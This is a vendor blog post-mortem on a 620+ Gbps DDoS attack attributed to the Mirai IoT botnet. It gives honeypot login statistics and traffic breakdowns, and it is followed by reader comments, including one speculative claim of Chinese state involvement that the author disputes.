Akamai Diversity

The Akamai Blog

620+ Gbps Attack - Post Mortem

On Tuesday, September 20, Akamai successfully defended against a DDoS attack exceeding 620 Gbps, nearly double that of the previous peak attack on our platform.

That attack and the recent release of the Mirai source code have generated a lot of interest in, and speculation about, the role of IoT devices in DDoS attacks. For several months, Akamai researchers have been looking into the code that is now known as Mirai. Much of that research was based on reverse engineering of the binary prior to the actual source code being released.

Based on that investigation and what we know from the DDoS attack from September 20th, we can confirm that the Mirai botnet was a major participant in the attack.  While there may have been at least one other botnet involved, we cannot confirm that the attacks were coordinated.

We have been tracking Mirai for some time, and published a Threat Advisory on what we called Kaiten (and the world now knows as Mirai) to customers on August 8. The Threat Advisory detailed our examination of a known-vulnerable device in order to analyze trends in brute force login attacks on the Internet.  The device existed on a Public IP and had open ports for listening services such as Telnet, SSH, HTTP, and SMTP, and more.  The first thing we observed was bots using default credentials associated with IoT and then we noticed commands that showed them attempting to load the malware.  In other words, within hours we saw how the Kaiten/Mirai botnet was growing.  Within 12 days we had made the following observations:

  • Roughly 100,000 total login attempts were made from more than 1,800 IP's

  • The top source countries were China (64%), Colombia (13%), South Korea (6%), and Vietnam (6%)

  • The most attacked protocols were SSH (57%) and Telnet (42%)

  • The top usernames were root (75%), admin (10%), shell (6%), and sh (6%)

  • The most common login attempts were for Internet ­connected surveillance cameras and associated DVR units

After the first day of massive attacks on September 20, the Mirai botnet and other botnets continued to attack in the days following.  Here's a sampling of where some of the attacks came from:

Tuesday (9/20)

GEO (Percent of traffic)

  • APJ (22%)
  • EMEA (47%)
  • NA (31%)

Thursday's (9/22) attacks had different breakdowns:

Attack (1) Attack Start: Sep 22

GEO (Percent of traffic)

  • APJ (15%)
  • EMEA (51%)
  • NA (34%)

Attack (2) Attack Start: Sep 22

GEO (Percent of traffic)

  • APJ (26%)
  • EMEA (46%)
  • NA (28%)

While this was the largest attack Akamai has recorded to date, there are additional factors that set it apart from a "standard DDoS." Most significantly, the attack was generated by a botnet that was comprised primarily of "Internet of Things" (IoT) devices. The majority of these devices were identified as security cameras and DVRs and were used in "Small Office/Home Office" setups.  We've confirmed that many of these devices use either easily guessable (admin, password, 1234) usernames and passwords or the default passwords originally configured on the devices. Additionally, the attack included a substantial amount of traffic connecting directly from the botnet to the target, rather than reflected and/or amplified traffic, as seen in recent large attacks using NTP and DNS vulnerabilities.

We continue to research the particulars of this attack as well as our security posture.  We'll continue to share significant details as they become available.

Thanks to Martin Mckeay (@mckeay) and Danny Wasserman for contributing research to this post.


As a developer of websites for local businesses in Brooklyn, should I be concerned about this? What steps can I take to protect my clients' sites from DdoS?

Thanks for the comment and question Rachel. I see candidates for DDoS mitigation services (you can find some here: https://www.akamai.com/us/en/solutions/products/cloud-security/) on your client list at http://brooklynupdates.com/clients/ I am probably biased when I say that DDoS mitigation is best served from the "Cloud", but I've noticed in the past year that more and more industry pundits and analysts (Gartner included) seem to agree. Beyond protecting your clients sites, there are things that every good netizen can and should do to update the "things" in their internet of things. For details on that, check out our Mirai/Kaiten threat advisory.

This is the most fascinating bot attack in years, and it is transcendent. I sense that it is a test-run of a much larger attack that we will face in the event of a kinetic conflict with other world powers (I write from the USA).

Think about it. 64% of the attacks were from bot-sites directly linked to IP's assigned to China-based servers. Hmmmm. A few were spread around to Columbia and others for whatever reasons.

But consider how many millions of networked devices we have connected in the USA. Of them, how many came from China? :)

And China coordinates manufacturing through the Peoples Army, which absolutely designed the devices sold into the USA as potential trojans in the event of war.

Winning "the war" without a shot being fired is classic Chinese military doctrine. The IoT is our Achilles heel, and the IoT is their Trojan Horse.

But boy didn't we get some great bargains on those cheap Chinese routers, hubs, DVR's and cameras! And to imagine that they were built in factories designed by American engineers, co-owned by American businesses and with money loaned from American banks.

Thanks for engaging Jerry. I agree that this attack is the most interesting in years, and also that it represents a seismic shift in the threat landscape. WRT attribution, I am not sure I am of the same mind as you. Generally speaking our research shows IoT devices have security weaknesses regardless of manufacturing origin.